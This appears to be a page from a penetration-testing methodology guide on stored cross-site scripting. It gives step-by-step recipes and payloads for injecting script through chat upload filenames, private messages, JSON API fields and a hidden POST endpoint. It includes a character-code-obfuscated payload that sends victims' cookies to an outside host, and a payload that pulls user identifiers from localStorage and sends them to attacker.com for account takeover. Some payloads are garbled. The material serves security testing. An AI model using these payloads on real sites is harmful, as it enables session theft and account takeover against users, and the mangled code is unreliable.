Stored Cross Site Scripting

Check List

Methodology

Black Box

Blind XSS

1

Set up an HTTP/HTTPS proxy (e.g., Burp Suite) and enable Intercept

2

Open the target support/chat interface and start uploading a file to the chat

3

When the upload request is captured, pause it in the proxy (Intercept)

4

Modify the filename field in the intercepted upload request to the exact string below

"><img src=1 onerror="url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61+encodeURIComponent(document['cookie']);xhttp=&#x20new&#x20XMLHttpRequest();xhttp'GET',url,true;xhttp'send';
5

Forward the modified request so the file with the altered filename appears in the chat

6

Open or refresh the support chat page; when the filename containing the payload is rendered, the XSS should trigger

1

Go to another users profile

2

Click private message

3

Type any subject

4

Type the following message Test<iframe src=javascript:alert(1) width=0 height=0 style=display:none;></iframe>

5

Send the message

6

View the message (triggers the XSS)

7

Wait for the victim to read the message

XSS In JSON Parameter

1

Log in and browse the site while keeping Burp Suite active

2

After checking the api requests that contain json parameters, check them

3

After checking once again, you will go to this api that has been created and a request has been made, and intercept the request

4

Inject inside parameters using XSS payloads

We can also inject into the ipAddress parameters

5

For example, the request below is a real example

{
    "ipAddress": "<svg on onload=(alert)(document.domain)>",
    "callBackURL":"dssdsd"
}
6

After sending the request to the server, it may give us an error code 400 in the response, but after sending the request, the payload was injected and the vulnerability occurred

localStorage Data Exfiltration To An Attacker Server Via XSS

1

Open Chrome DevTools Press F12, navigate to Sources > Page tab

2

Search JavaScript Files Use Ctrl+F to search for keywords: path:, url:, api/, v1/

3

Identify Hidden Endpoint Locate unlinked POST endpoint like /platform/apps/lighthouse-homepage from fetch() call

4

Test Basic XSS Payload Submit POST request with body: {"userInput": "<a href="javascript:alert(1)">clickme"}

5

Verify XSS Execution Confirm alert(1) popup proving unsanitized rendering

6

Inspect LocalStorage In DevTools Console, run JSON.stringify(localStorage) to identify sensitive keys

7

Craft Regex Exfiltration Payload , use 

<a href="javascript:var match=JSON.stringify(localStorage).match(/ZNavIdentity\.userId=[^&]+&currEntityId=[^&]+/);if(match)fetch('https://attacker.com/?data='+encodeURIComponent(match[0]))">Click to "Verify"</a>
8

Submit Stored XSS Payload POST {"userInput": [above payload]} to store malicious link

9

Monitor Attacker Server Check https://attacker.com for exfiltrated userId and currEntityId from LocalStorage

10

Verify Account Takeover Confirm stolen PII enables full account access and privilege escalation

White Box

Cheat Sheet

PreviousReflected Cross Site ScriptingNextHTTP Verb Tampering

Last updated